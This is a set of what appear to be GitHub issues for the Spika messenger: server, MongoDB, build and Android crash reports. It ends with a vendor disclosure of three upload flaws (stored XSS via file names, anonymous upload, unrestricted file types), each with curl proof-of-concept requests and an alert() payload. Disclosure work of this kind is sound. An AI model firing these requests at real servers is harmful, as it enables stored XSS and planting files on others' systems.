node src/server/main.js Connecting mongoDB mongodb://localhost/simplemessenger (node:2858) DeprecationWarning: open() is deprecated in mongoose >= 4.11.0, use openUri() instead, or set the useMongoClient option if using connect() or createConnection(). See http://mongoosejs.com/docs/connections.html#use-mongo-client events.js:160 throw er; // Unhandled 'error' event ^

Error: listen EACCES 0.0.0.0:811 at Object.exports._errnoException (util.js:1018:11) at exports._exceptionWithHostPort (util.js:1041:20) at Server._listen2 (net.js:1245:19) at listen (net.js:1294:10) at Server.listen (net.js:1390:5) at Object. (/Users/devupload/Spika/web/src/server/main.js:18:8) at Module._compile (module.js:570:32) at Object.Module._extensions..js (module.js:579:10) at Module.load (module.js:487:32) at tryModuleLoad (module.js:446:12) at Function.Module._load (module.js:438:3) at Module.runMain (module.js:604:10) at run (bootstrap_node.js:390:7) at startup (bootstrap_node.js:150:9) at bootstrap_node.js:505:3

getting this error stack trace: TypeError: callback must be a function at makeCallback (evalmachine.:78:11) at Object.fs.rename (evalmachine.:668:14) at /root/myolo/myolo/Spika/web/src/server/WebAPI/FileUploadHandler.js:197:40 at model. (/root/myolo/myolo/Spika/web/node_modules/mongoose/lib/document.js:1913:20) at next_ (/root/myolo/myolo/Spika/web/node_modules/hooks-fixed/hooks.js:89:34) at fnWrapper (/root/myolo/myolo/Spika/web/node_modules/hooks-fixed/hooks.js:186:18) at /root/myolo/myolo/Spika/web/node_modules/mongoose/lib/model.js:3361:16 at /root/myolo/myolo/Spika/web/node_modules/mongoose/lib/model.js:228:5 at /root/myolo/myolo/Spika/web/node_modules/mongoose/lib/model.js:135:7 at /root/myolo/myolo/Spika/web/node_modules/mongodb/lib/collection.js:504:5 at /root/myolo/myolo/Spika/web/node_modules/mongodb/lib/collection.js:666:5 at /root/myolo/myolo/Spika/web/src/server/WebAPI/FileUploadHandler.js:197:40 at model. (/root/myolo/myolo/Spika/web/node_modules/mongoose/lib/document.js:1913:20) at next_ (/root/myolo/myolo/Spika/web/node_modules/hooks-fixed/hooks.js:89:34) at fnWrapper (/root/myolo/myolo/Spika/web/node_modules/hooks-fixed/hooks.js:186:18) at /root/myolo/myolo/Spika/web/node_modules/mongoose/lib/model.js:3361:16 at /root/myolo/myolo/Spika/web/node_modules/mongoose/lib/model.js:228:5 at /root/myolo/myolo/Spika/web/node_modules/mongoose/lib/model.js:135:7

I get the following error when I run the main js file. Can anyone help me on this? node src/server/main.js

Error in Terminal

Connecting mongoDB mongodb://localhost/simplemessenger
events.js:141
      throw er; // Unhandled 'error' event
      ^

Error: listen EACCES 0.0.0.0:80
    at Object.exports._errnoException (util.js:870:11)
    at exports._exceptionWithHostPort (util.js:893:20)
    at Server._listen2 (net.js:1224:19)
    at listen (net.js:1273:10)
    at Server.listen (net.js:1369:5)
    at Object.<anonymous> (/home/ratish/Spika/web/src/server/main.js:18:8)
    at Module._compile (module.js:410:26)
    at Object.Module._extensions..js (module.js:417:10)
    at Module.load (module.js:344:32)
    at Function.Module._load (module.js:301:12)
    at Function.Module.runMain (module.js:442:10)
    at startup (node.js:136:18)
    at node.js:966:3

Thanks for this awesome app! Just installed the backend code and started node server. I tried to access the web app to test the connection. The node server shows:

which is normal I think?

The browser, however, stucks at Loading Spika stage:

Any clue what went wrong? I tried it on both Chrome and Safari.

I'm new to this so any help is appreciated.

{ Error: Command failed: convert /tmp/upload_c9b9681637a6904334a16a67cc34321c -auto-orient -gravity Center -interpolate bicubic -strip -thumbnail x256 -crop 256x256+0+0 public/uploads/595fcacffbce634becd044aa_thumb.jpg convert: unrecognized interpolate method `bicubic' @ error/convert.c/ConvertImageCommand/1898.

at ChildProcess.exithandler (child_process.js:204:12)
at emitTwo (events.js:106:13)
at ChildProcess.emit (events.js:191:7)
at maybeClose (internal/child_process.js:886:16)
at Socket.<anonymous> (internal/child_process.js:342:11)
at emitOne (events.js:96:13)
at Socket.emit (events.js:188:7)
at Pipe._handle.close [as _onclose] (net.js:497:12)

killed: false, code: 1, signal: null, cmd: 'convert /tmp/upload_c9b9681637a6904334a16a67cc34321c -auto-orient -gravity Center -interpolate bicubic -strip -thumbnail x256 -crop 256x256+0+0 public/uploads/595fcacffbce634becd044aa_thumb.jpg' }

node src/server/main.js Connecting mongoDB mongodb://localhost/simplemessenger Server listening on port 80! Failed to connect MongoDB! { MongoError: failed to connect to server [localhost:27017] on first connect [MongoError: connect ECONNREFUSED 127.0.0.1:27017] at Pool. (/Users/devupload/Spika/web/node_modules/mongodb-core/lib/topologies/server.js:328:35) at emitOne (events.js:96:13) at Pool.emit (events.js:188:7) at Connection. (/Users/devupload/Spika/web/node_modules/mongodb-core/lib/connection/pool.js:280:12) at Connection.g (events.js:292:16) at emitTwo (events.js:106:13) at Connection.emit (events.js:191:7) at Socket. (/Users/devupload/Spika/web/node_modules/mongodb-core/lib/connection/connection.js:177:49) at Socket.g (events.js:292:16) at emitOne (events.js:96:13) at Socket.emit (events.js:188:7) at emitErrorNT (net.js:1277:8) at _combinedTickCallback (internal/process/next_tick.js:80:11) at process._tickCallback (internal/process/next_tick.js:104:9) name: 'MongoError', message: 'failed to connect to server [localhost:27017] on first connect [MongoError: connect ECONNREFUSED 127.0.0.1:27017]' }

I have added chat in an iframe when a new room id is created and chat gets loads, the page always jumps to the bottom textbox to type a new message. How can I stop this bottom scroll?

I have added chat in an iframe when a new room id is created and chat gets loads, the page always jumps to the bottom textbox to type a new message. How can I stop this bottom scroll?

I am new to nodejs, and I got this error when configuring the web server:

$ gulp build-dist /var/repo/Spika/web/node_modules/gulp-sass/index.js:66 let sassMap; ^^^

SyntaxError: Block-scoped declarations (let, const, function, class) not yet supported outside strict mode at exports.runInThisContext (vm.js:53:16) at Module._compile (module.js:374:25) at Object.Module._extensions..js (module.js:417:10) at Module.load (module.js:344:32) at Function.Module._load (module.js:301:12) at Module.require (module.js:354:17) at require (internal/module.js:12:17) at Object. (/var/repo/Spika/web/gulpfile.js:7:12) at Module._compile (module.js:410:26) at Object.Module._extensions..js (module.js:417:10)

App is crashing as soon as chat activity is opened.

Logcat:

`05-01 19:43:24.070 11704-11801/com.example.app E/AndroidRuntime: FATAL EXCEPTION: OkHttp Dispatcher Process: cy.agorise.localbts, PID: 11704 java.lang.NoSuchMethodError: No virtual method callEngineGetConnection(Lcom/squareup/okhttp/Call;)Lcom/squareup/okhttp/Connection; in class Lcom/squareup/okhttp/internal/Internal; or its super classes (declaration of 'com.squareup.okhttp.internal.Internal' appears in /data/app/com.example.app-1/split_lib_dependencies_apk.apk) at com.squareup.okhttp.ws.WebSocketCall.createWebSocket(WebSocketCall.java:154) at com.squareup.okhttp.ws.WebSocketCall.access$000(WebSocketCall.java:42) at com.squareup.okhttp.ws.WebSocketCall$1.onResponse(WebSocketCall.java:102) at com.squareup.okhttp.Call$AsyncCall.execute(Call.java:177) at com.squareup.okhttp.internal.NamedRunnable.run(NamedRunnable.java:33) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1133) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:607) at java.lang.Thread.run(Thread.java:760)

05-01 19:43:24.087 11704-11704/com.example.app E/LOG: Closing socket`

Hi Spika,

I found some multiple vulnerabilities via upload function on Web Application Version. Here are the details:

SUMMARY

Exploit Title: Spika - Multipurpose Opensource Messenger - Multiple vulnerabilities in upload function Dork: N/A Date: 10/11/2017 Vendor : http://spikaapp.com/ Software: http://spikaapp.com/; https://github.com/cloverstudio/Spika Demo: N/A Affected version: the lastest version Author: Btis Team

VULNER 1 - Stored XSS

Description

Upload file function is in chat room does not validate the file name. So that, the attacker can inject XSS payload Payload will be triggered when the response of loading message api returns

Exploit

Payload: <script>alert('test')</script>

curl -i -s -k -X 'POST'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' -H 'access-token: w47OMKY7PKXqYhKhWEoInfUk' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: http://localhost/spika/' -H 'Content-Type: multipart/form-data; boundary=---------------------------216352219610'
-b 'io=2MpySFezOj_Wxvx_AAAD; cookie_logininfo={%22id%22:%223%22%2C%22name%22:%22test%22%2C%22avatarURL%22:%22%22%2C%22roomID%22:%223%22}'
--data-binary $'-----------------------------216352219610\x0d\x0aContent-Disposition: form-data; name="file"; filename=""\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------216352219610--\x0d\x0a'
'http://localhost/spika/v1/file/upload'

VULNER 2 - Upload File into the Web Server by Anonymous User

Description

Upload file function is in chat room does check cookies or access-token. So that, the attacker can upload file into server by Anonymous user

Exploit

Payload:

curl -i -s -k -X 'POST'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: http://localhost/spika/' -H 'Content-Type: multipart/form-data; boundary=---------------------------216352219610'
--data-binary $'-----------------------------216352219610\x0d\x0aContent-Disposition: form-data; name="file"; filename="JPG.jpg.txt"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------216352219610--\x0d\x0a'
'http://localhost/spika/v1/file/upload'

VULNER 3 - Unrestricted Upload of File

Description

Upload file function fails in checking file extension. So that, the attacker can upload malware into server. Beside, file uploaded can be downloaded without authentication that make the vulnerability is more dangerous.

Exploit

Payload:

curl -i -s -k -X 'POST'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: http://localhost/spika/' -H 'Content-Type: multipart/form-data; boundary=---------------------------216352219610'
--data-binary $'-----------------------------216352219610\x0d\x0aContent-Disposition: form-data; name="file"; filename="JPG.jpg.html"\x0d\x0aContent-Type: text/html\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------216352219610--\x0d\x0a'
'http://localhost/spika/v1/file/upload'

Feel free to ask me more information

Regards,